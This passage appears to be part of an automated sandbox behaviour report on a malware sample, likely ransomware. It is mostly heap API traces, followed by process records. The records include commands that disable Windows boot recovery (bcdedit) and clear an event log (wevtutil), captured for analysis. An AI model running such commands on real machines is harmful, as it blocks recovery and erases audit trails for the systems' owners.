GetProcessHeap () returned 0x1523d3d0000 [0120.658] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d88f0) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d88f0) returned 0x20 [0120.658] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d88f0) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d8920) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d8920) returned 0x20 [0120.658] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d8920) returned 1 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.658] GetProcessHeap () returned 0x1523d3d0000 [0120.659] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d8770) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d8770) returned 0x20 [0120.659] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d8770) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d8980) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d8980) returned 0x20 [0120.659] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d8980) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfa70) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfa70) returned 0x20 [0120.659] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfa70) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfe00) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfe00) returned 0x20 [0120.659] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfe00) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d4cb0) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d4cb0) returned 0x30 [0120.659] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d4cb0) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfb90) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfb90) returned 0x20 [0120.659] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfb90) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d4cf0) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.659] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d4cf0) returned 0x30 [0120.659] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d4cf0) returned 1 [0120.659] GetProcessHeap () returned 0x1523d3d0000 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e0040) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e0040) returned 0x20 [0120.660] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e0040) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3f1c10) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3f1c10) returned 0x86 [0120.660] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3f1c10) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3efc40) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3efc40) returned 0x20 [0120.660] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3efc40) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df320) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df320) returned 0x18 [0120.660] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df320) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d8a40) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d8a40) returned 0x20 [0120.660] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d8a40) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d8a70) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d8a70) returned 0x20 [0120.660] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d8a70) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d8740) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.660] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d8740) returned 0x20 [0120.660] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d8740) returned 1 [0120.660] GetProcessHeap () returned 0x1523d3d0000 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d8860) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d8860) returned 0x20 [0120.661] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d8860) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df2a0) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df2a0) returned 0x18 [0120.661] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df2a0) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d87a0) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d87a0) returned 0x20 [0120.661] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d87a0) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3d8890) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3d8890) returned 0x20 [0120.661] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3d8890) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfdd0) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfdd0) returned 0x20 [0120.661] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfdd0) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3e00d0) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3e00d0) returned 0x20 [0120.661] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3e00d0) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dff50) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.661] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dff50) returned 0x20 [0120.661] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dff50) returned 1 [0120.661] GetProcessHeap () returned 0x1523d3d0000 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfda0) returned 1 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfda0) returned 0x20 [0120.662] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfda0) returned 1 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfe60) returned 1 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfe60) returned 0x20 [0120.662] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfe60) returned 1 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfb30) returned 1 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfb30) returned 0x20 [0120.662] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfb30) returned 1 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df1a0) returned 1 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df1a0) returned 0x18 [0120.662] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df1a0) returned 1 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3dfce0) returned 1 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3dfce0) returned 0x20 [0120.662] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3dfce0) returned 1 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] HeapValidate (hHeap=0x1523d3d0000, dwFlags=0x0, lpMem=0x1523d3df1e0) returned 1 [0120.662] GetProcessHeap () returned 0x1523d3d0000 [0120.662] RtlSizeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, MemoryPointer=0x1523d3df1e0) returned 0x18 [0120.662] RtlFreeHeap (HeapHandle=0x1523d3d0000, Flags=0x0, BaseAddress=0x1523d3df1e0) returned 1 [0120.662] exit (_Code=0) Thread: id = 121 os_tid = 0x4e4 Process: id = "19" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2112c000" os_pid = "0xa24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x1204" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 75 os_tid = 0xd10 Thread: id = 81 os_tid = 0xba4 Thread: id = 99 os_tid = 0x1100 Thread: id = 116 os_tid = 0x1120 Thread: id = 118 os_tid = 0xcf4 Process: id = "20" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x213df000" os_pid = "0x58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\"C:\\Windows\\System32\\bcdedit.exe\" /set {default} recoveryenabled no" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 82 os_tid = 0xda0 Thread: id = 131 os_tid = 0xf40 Process: id = "21" image_name = "wevtutil.exe" filename = "c:\\windows\\system32\\wevtutil.exe" page_root = "0x21271000" os_pid = "0xdcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\"C:\\Windows\\System32\\wevtutil.exe\" cl Setup" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 83 os_tid = 0x1124 Thread: id = 135 os_tid = 0xba0 Thread: id = 136 os_tid = 0x1124 Process: id = "22" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x21422000" os_pid = "0x1128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x36c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 84 os_tid = 0x112c Thread: id = 94 os_tid = 0xc20 Thread: id = 98 os_tid = 0x10fc Thread: id = 108 os_tid = 0x664 Thread: id = 113 os_tid = 0xa8c Process: id = "23" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x21477000" os_pid = "0x1130" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x1198" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 85 os_tid = 0x1134 Thread: id = 95 os_tid = 0x111c Thread: id = 127 os_tid = 0x774 Thread: id = 133 os_tid = 0xec0 Thread: id = 134 os_tid = 0xed4 Process: id = "24" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x214bb000" os_pid = "0xd74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x58" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 92 os_tid = 0xd40 Thread: id = 96 os_tid = 0x10ec Thread: id = 114 os_tid = 0x10e4 Thread: id = 125 os_tid = 0xfe4 Thread: id = 126 os_tid = 0x680 Process: id = "25" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7778a000" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xdcc" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 93 os_tid = 0xd60 Thread: id = 97 os_tid = 0x10f0 Thread: id = 122 os_tid = 0x4f4 Thread: id = 129 os_tid = 0xe4c Thread: id = 130 os_tid = 0xf38 Thread: id = 140 os_tid = 0xe4c Process: id = "26" image_name = "wbengine.exe" filename = "c:\\windows\\system32\\wbengine.exe" page_root = "0x5db86000" os_pid = "0x10a0" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x23c" cmd_line = "\"C:\\WINDOWS\\system32\\wbengine.exe\"" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:000a55ab" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 144 os_tid = 0xef4 Thread: id = 145 os_tid = 0xfd8 Thread: id = 146 os_tid = 0xcdc Thread: id = 147 os_tid = 0xe14 Thread: id = 148 os_tid = 0xab4 Thread: id = 149 os_tid = 0xd7c Thread: id = 150 os_tid = 0xea0 Thread: id = 151 os_tid = 0x10b0 Process: id = "27" image_name = "vdsldr.exe" filename = "c:\\windows\\system32\\vdsldr.exe" page_root = "0x27d71000" os_pid = "0xf64" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "26" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\System32\\vdsldr.exe -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:000a55ab" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 152 os_tid = 0x10c4 Thread: id = 153 os_tid = 0x2d4 Thread: id = 154 os_tid = 0x10c0 Thread: id = 155 os_tid = 0x3b8 Thread: id = 156 os_tid = 0x10bc Thread: id = 157 os_tid = 0xd94 Thread: id = 158 os_tid = 0xf60 Process: id = "28" image_name = "vds.exe" filename = "c:\\windows\\system32\\vds.exe" page_root = "0x2cc42000" os_pid = "0x10d0" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "27" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\vds.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\vds" [0xe], "NT AUTHORITY\\Logon Session 00000000:000a7653" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 159 os_tid = 0x10e0 Thread: id = 160 os_tid = 0xa7c Thread: id = 161 os_tid = 0x10dc Thread: id = 162 os_tid = 0x58c Thread: id = 163 os_tid = 0xca4 Thread: id = 164 os_tid = 0xa84 Thread: id = 165 os_tid = 0xc1c Thread: id = 166 os_tid = 0x10b8 Thread: id = 167 os_tid = 0xdec Thread: id = 168 os_tid = 0x1058 Thread: id = 169 os_tid = 0x1064 Thread: id = 170 os_tid = 0x1074 Thread: id = 171 os_tid = 0x1078 Thread: id = 172 os_tid = 0x1080 Thread: id = 173 os_tid = 0x101c Thread: id = 174 os_tid = 0x1008 Process: id = "29" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x742fe000" os_pid = "0x3ac" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "28" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], 